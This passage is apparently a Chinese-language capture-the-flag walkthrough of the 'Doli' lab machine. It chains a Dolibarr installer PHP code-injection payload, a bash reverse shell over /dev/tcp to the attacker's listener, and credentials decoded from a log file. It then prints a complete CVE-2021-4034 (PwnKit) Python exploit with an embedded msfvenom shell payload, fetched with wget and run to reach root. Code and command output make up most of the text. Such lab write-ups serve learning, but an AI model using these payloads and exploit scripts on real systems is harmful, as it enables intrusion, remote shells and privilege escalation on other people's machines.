testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
```
- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
## Timeline
- 06/29/2018 18:30 - Found vulnerability.
- 06/29/2018 18:44 - Report vendor.
- 06/29/2018 20:38 - Vulnerability fixed by vendor.
GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032
2.3 漏洞利用
2.3.1 PHP Code Injection利用
这里选择利用第二个漏洞,先扫一下目录
┌──(root㉿MYsec)-[~hirak0/Vulhub/105]
└─# gobuster dir -u http://erp.doli.thm/install -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://erp.doli.thm/install
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html,conf
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/lib (Status: 301) [Size: 194] [--> http://erp.doli.thm/install/lib/]
/mysql (Status: 301) [Size: 194] [--> http://erp.doli.thm/install/mysql/]
/upgrade.php (Status: 200) [Size: 166]
/robots.txt (Status: 200) [Size: 25]
/inc.php (Status: 200) [Size: 0]
/step1.php (Status: 200) [Size: 2056]
/step2.php (Status: 200) [Size: 2204]
/repair.php (Status: 200) [Size: 3459]
/mssql (Status: 301) [Size: 194] [--> http://erp.doli.thm/install/mssql/]
/pgsql (Status: 301) [Size: 194] [--> http://erp.doli.thm/install/pgsql/]
/step4.php (Status: 200) [Size: 2192]
/medias (Status: 301) [Size: 194] [--> http://erp.doli.thm/install/medias/]
/Brian.php (Status: 302) [Size: 0] [--> Seth.php?testget=ok]
/step5.php (Status: 200) [Size: 2777]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
访问:http://erp.doli.thm/install/Seth.php?testget=ok
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# systemctl start mysql
这里得先把kali中的mysql启用,在配置一下远程访问
然后再去配置一下doli
修改db_name参数里面的值
db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F
Send后响应内容如图所示则说明注入成功了
现在我们再访问一下:http://erp.doli.thm/install/Brian.php
会发现自动跳转到:http://erp.doli.thm/install/Seth.php?testget=ok
做一下命令执行看看:http://erp.doli.thm/install/Seth.php?cmd=whoami
2.3.2 GetShell
kali中监听
nc -lvvp 6666
我们在给cmd参数注入如下命令
http://erp.doli.thm/install/Seth.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/192.168.10.148/6666+0%3E%261%27
回车后,成功getshell
┌──(root㉿MYsec)-[~hirak0/Vulhub/105]
└─# nc -lvvp 6666
listening on [any] 6666 ...
connect to [192.168.10.148] from doli.thm [192.168.10.152] 40704
bash: cannot set terminal process group (1332): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Doli:~/dolibarr/htdocs/install$
2.4 权限提升
find查找suid二进制程序
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
www-data@Doli:/home$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 May 26 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Feb 8 2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14864 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 84120 Apr 9 2019 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 32944 Mar 26 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 23376 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 136808 Jan 20 2021 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
-rwsr-xr-x 1 root root 32944 Mar 26 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 71824 Mar 26 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 54256 Mar 26 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 Mar 26 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 26 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 26 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 40152 Jan 27 2020 /bin/mount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 26 2019 /bin/su
-rwsr-xr-x 1 root root 27608 Jan 27 2020 /bin/umount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
去https://gtfobins.github.io/查找一下
没有发现可以利用的
信息搜集
www-data@Doli:~/dolibarr/htdocs/install$ cd /home
cd /home
www-data@Doli:/home$ ls
ls
c3p0
m3dsec
ybenel
www-data@Doli:/home$ ls c3p0
ls c3p0
ls: cannot open directory 'c3p0': Permission denied
www-data@Doli:/home$ ls -al c3p0
ls -al c3p0
ls: cannot open directory 'c3p0': Permission denied
www-data@Doli:/home$ ls -al m3dsec
ls -al m3dsec
ls: cannot open directory 'm3dsec': Permission denied
www-data@Doli:/home$ ls -al ybenel
ls -al ybenel
ls: cannot open directory 'ybenel': Permission denied
用户目录都没有权限查看,那就去看一下opt目录
www-data@Doli:/opt$ ls
ls
ViewMe.png playbooks secrets stewie.el
www-data@Doli:/opt$ cd playbooks
cd playbooks
www-data@Doli:/opt/playbooks$ ls
ls
get_secrets.yml
www-data@Doli:/opt/playbooks$ cat get_secrets.yml
cat get_secrets.yml
cat: get_secrets.yml: Permission denied
www-data@Doli:/opt/playbooks$ cd ../secrets
cd ../secrets
bash: cd: ../secrets: Permission denied
www-data@Doli:/opt/playbooks$ cat ../stewie.el
cat ../stewie.el
(defun main ()
(print "VictoryShallBeMine!"))
(main)
也没有啥权限,有一个图,下载下来看看,一个奇怪的单词?
同目录下有secrets的目录,这个不会是一个加密的编码方式吧?好像是又这个编码
去CyberChef查一下看看,还真有,先放着,密文还没拿到呢
再看一下tmp目录
www-data@Doli:/tmp$ ls -al
ls -al
total 72
drwxrwxrwt 7 root root 4096 Apr 5 18:35 .
drwxr-xr-x 23 root root 4096 Apr 5 15:51 ..
drwxrwxrwt 2 root root 4096 Apr 5 15:51 .ICE-unix
drwxrwxrwt 2 root root 4096 Apr 5 15:51 .Test-unix
drwxrwxrwt 2 root root 4096 Apr 5 15:51 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 5 15:51 .XIM-unix
drwxrwxrwt 2 root root 4096 Apr 5 15:51 .font-unix
-rw-rw-r-- 1 www-data www-data 37948 Apr 5 18:20 dolibarr_install.log
直接上神器
linpeas神器使用
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
--
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
上述的漏洞都得依赖一个用户,www-data的权限太低了,得想办法提权到其中一个用户上,再提权到root上
提权至c3p0
看一下日志目录下有什么有用的日志
www-data@Doli:/var/log$ ls -al
ls -al
total 13756
drwxrwxr-x 10 root syslog 4096 Apr 5 15:51 .
drwxr-xr-x 14 root root 4096 Mar 22 2021 ..
-rw-r--r-- 1 root root 7775 Mar 22 2021 alternatives.log
drwxr-x--- 2 root adm 4096 Mar 20 2021 apache2
drwxr-xr-x 2 root root 4096 Mar 16 2021 apt
-rw-r----- 1 syslog adm 3866626 Apr 5 19:14 auth.log
-rw------- 1 root utmp 4224 Mar 22 2021 btmp
-rw-r--r-- 1 root root 51280 Apr 5 15:51 cloud-init-output.log
-rw-r--r-- 1 syslog adm 1412269 Apr 5 15:51 cloud-init.log
drwxr-xr-x 2 root root 4096 Oct 9 2020 dist-upgrade
-rw-r--r-- 1 root root 332226 Apr 5 15:52 dpkg.log
-rw-r--r-- 1 root root 1286 Mar 21 2021 fontconfig.log
drwxr-xr-x 2 root root 4096 Mar 16 2021 fsck
-rw-r----- 1 syslog adm 1745648 Apr 5 18:45 kern.log
-rw-rw-r-- 1 root utmp 292876 Jul 29 2021 lastlog
drwxr-xr-x 2 root root 4096 Dec 7 2017 lxd
drwxr-x--- 2 mysql adm 4096 Mar 20 2021 mysql
drwxr-xr-x 3 root adm 4096 Mar 22 2021 nginx
-rw------- 1 root root 13769 Apr 5 15:51 php7.0-fpm.log
-rw-r----- 1 syslog adm 6388860 Apr 5 19:14 syslog
-rw-r----- 1 syslog adm 8480 Mar 21 2021 ufw.log
drwxr-x--- 2 root adm 4096 Mar 21 2021 unattended-upgrades
-rw-r--r-- 1 root root 664 Jul 29 2021 vmware-network.1.log
-rw-r--r-- 1 root root 644 Jul 29 2021 vmware-network.2.log
-rw-r--r-- 1 root root 664 Jul 29 2021 vmware-network.3.log
-rw-r--r-- 1 root root 644 Jul 29 2021 vmware-network.4.log
-rw-r--r-- 1 root root 660 Jul 5 2021 vmware-network.5.log
-rw-r--r-- 1 root root 640 Jul 5 2021 vmware-network.6.log
-rw-r--r-- 1 root root 664 Mar 23 2021 vmware-network.7.log
-rw-r--r-- 1 root root 644 Mar 23 2021 vmware-network.8.log
-rw-r--r-- 1 root root 664 Mar 23 2021 vmware-network.9.log
-rw-r--r-- 1 root root 640 Apr 5 15:51 vmware-network.log
-rw-r--r-- 1 root root 2196 Jul 29 2021 vmware-vmsvc.1.log
-rw-r--r-- 1 root root 2196 Jul 29 2021 vmware-vmsvc.2.log
-rw-r--r-- 1 root root 2196 Jul 5 2021 vmware-vmsvc.3.log
-rw-r--r-- 1 root root 1473 Apr 5 15:51 vmware-vmsvc.log
-rw-rw-r-- 1 root utmp 80256 Apr 5 15:51 wtmp
www-data@Doli:/var/log$ cat auth.log
cat auth.log
cat: auth.log: Permission denied
www-data@Doli:/var/log$ cd apache2
cd apache2
bash: cd: apache2: Permission denied
www-data@Doli:/var/log$ cd nginx
cd nginx
www-data@Doli:/var/log/nginx$ ls -al
ls -al
total 3511392
drwxr-xr-x 3 root adm 4096 Mar 22 2021 .
drwxrwxr-x 10 root syslog 4096 Apr 5 15:51 ..
drwxr-xr-x 2 www-data www-data 4096 Mar 22 2021 .bk
-rw-r----- 1 www-data adm 1723564661 Apr 5 19:09 access.log
-rw-r----- 1 www-data adm 1872076004 Apr 5 18:34 error.log
发现有一个.bk有点意思,看一下里边都是啥
www-data@Doli:/var/log/nginx/.bk$ ls -al
ls -al
total 180
drwxr-xr-x 2 www-data www-data 4096 Mar 22 2021 .
drwxr-xr-x 3 root adm 4096 Mar 22 2021 ..
-rw-r----- 1 www-data www-data 175190 Mar 21 2021 access.log.bk
在日志里看到了一个特殊的请求
172.16.1.1 - - [20/Mar/2021:13:03:38 +0000] "GET /5455644852464247526b464a526b4e4254455a435155314752304651516b5a4653554e4453464243526b564a52304e45544564435245314652304a4c5155464754304646526b74425155593d HTTP/1.1" 403 152 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
这个不会是上边那个的密文吧
解密看看
感觉少了点什么,应该是套娃的密文,看着像是16进制的,先解一下16进制
果然,解出来了base64的密文
这个不知道是不是就是Citrix编码了
解出来一个c3p0p4ssw0rd@@,这个应该是密码
前边有三个用户,这个可能是c3p0的密码
c3p0
m3dsec
ybenel
尝试ssh登录一下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/105]
└─# ssh c3p0@192.168.10.152
The authenticity of host '192.168.10.152 (192.168.10.152)' can't be established.
ED25519 key fingerprint is SHA256:tExKwJAuI2dx2w3YX6+RTB2QHCBdzfKrVfkvY8Es2Ok.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.10.152' (ED25519) to the list of known hosts.
c3p0@192.168.10.152's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
34 packages can be updated.
2 of these updates are security updates.
To see these additional updates run: apt list --upgradable
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
*** System restart required ***
Welcome To Doli (Stewie's Deadly Project)
Last login: Thu Jul 29 13:03:51 2021 from 172.16.118.2
c3p0@Doli:~$
提权至root
c3p0@Doli:~$ ls -al
total 88
drwx------ 3 c3p0 c3p0 4096 Jul 29 2021 .
drwxr-xr-x 5 root root 4096 Mar 21 2021 ..
lrwxrwxrwx 1 root root 9 Mar 21 2021 .bash_history -> /dev/null
-rw-r--r-- 1 c3p0 c3p0 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 c3p0 c3p0 3771 Aug 31 2015 .bashrc
drwx------ 2 c3p0 c3p0 4096 Mar 22 2021 .cache
-r-------- 1 c3p0 c3p0 101 Jul 29 2021 note.txt
-rw-r--r-- 1 c3p0 c3p0 655 Jul 12 2019 .profile
-rw-rw-r-- 1 c3p0 c3p0 60476 Mar 30 2020 tnakt.jpg
c3p0@Doli:~$ cat note.txt
ybenel: i love using a dictionary or multiple dictionaries of words in order to create my passwords
c3p0@Doli:~$
这里另外一个用户ybenel喜欢用字典创建密码?
不管了,已经拿到一个用户的权限了,用前边linpeas跑出来的漏洞直接提权
这里选择使用CVE-2021-4034,比较常用的一个洞了
漏洞利用脚本如下
#!/usr/bin/env python3
# CVE-2021-4034 in Python
#
# Joe Ammond (joe@ammond.org)
#
# This was just an experiment to see whether I could get this to work
# in Python, and to play around with ctypes
# This was completely cribbed from blasty's original C code:
# https://haxx.in/files/blasty-vs-pkexec.c
import base64
import os
import sys
from ctypes import *
from ctypes.util import find_library
# Payload, base64 encoded ELF shared object. Generate with:
#
# msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
#
# The PrependSetuid=true is important, without it you'll just get
# a shell as the user and not root.
#
# Should work with any msfvenom payload, tested with linux/x64/exec
# and linux/x64/shell_reverse_tcp
payload_b64 = b'''
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
'''
payload = base64.b64decode(payload_b64)
# Set the environment for the call to execve()
environ = [
b'exploit',
b'PATH=GCONV_PATH=.',
b'LC_MESSAGES=en_US.UTF-8',
b'XAUTHORITY=../LOL',
None
]
# Find the C library to call execve() directly, as Python helpfully doesn't
# allow us to call execve() with no arguments.
try:
libc = CDLL(find_library('c'))
except:
print('[!] Unable to find the C library, wtf?')
sys.exit()
# Create the shared library from the payload
print('[+] Creating shared library for exploit code.')
try:
with open('payload.so', 'wb') as f:
f.write(payload)
except:
print('[!] Failed creating payload.so.')
sys.exit()
os.chmod('payload.so', 0o0755)
# make the GCONV_PATH directory
try:
os.mkdir('GCONV_PATH=.')
except FileExistsError:
print('[-] GCONV_PATH=. directory already exists, continuing.')
except:
print('[!] Failed making GCONV_PATH=. directory.')
sys.exit()
# Create a temp exploit file
try:
with open('GCONV_PATH=./exploit', 'wb') as f:
f.write(b'')
except:
print('[!] Failed creating exploit file')
sys.exit()
os.chmod('GCONV_PATH=./exploit', 0o0755)
# Create directory to hold gconf-modules configuration file
try:
os.mkdir('exploit')
except FileExistsError:
print('[-] exploit directory already exists, continuing.')
except:
print('[!] Failed making exploit directory.')
sys.exit()
# Create gconf config file
try:
with open('exploit/gconv-modules', 'wb') as f:
f.write(b'module UTF-8// INTERNAL ../payload 2\n');
except:
print('[!] Failed to create gconf-modules config file.')
sys.exit()
# Convert the environment to an array of char*
environ_p = (c_char_p * len(environ))()
environ_p[:] = environ
print('[+] Calling execve()')
# Call execve() with NULL arguments
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)
将脚本上传至靶机即可
c3p0@Doli:~$ wget http://192.168.10.148:8888/CVE-2021-4034.py
--2024-04-05 19:41:54-- http://192.168.10.148:8888/CVE-2021-4034.py
Connecting to 192.168.10.148:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’
CVE-2021-4034.py 100%[===================================>] 3.19K --.-KB/s in 0s
2024-04-05 19:41:54 (325 MB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]
c3p0@Doli:~$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(c3p0) groups=1000(c3p0)
# ls
CVE-2021-4034.py GCONV_PATH=. exploit note.txt payload.so tnakt.jpg
# cd /root
# ls
root.txt upload.sh
# cat root.txt
# Congratulations U Have Successfully Completed This Machine
8acc13af5d191ee0874fb7c198dd6aab
成功提权至root用户,并拿到flag-root
# cd /home
# ls
c3p0 m3dsec ybenel
# cd m3dsec
# ls
secrets
# cd secrets
# ls
secret.txt
# cat secret.txt
There's no secret here lol
# cd /home/ybenel
# ls
user.txt
# cat user.txt
06f76a9db3cf7ea1450315618f5d7863
回头去看看用户目录,拿到flag-user
三、总结
该靶机信息收集很重要
- gobuster爆破子域名
- BurpSuite爆破子域名
- MYSQL配置远程访问
- PHP Code Injection利用
- Hex+Base64+Citrix解码
- CVE-2021-4034利用
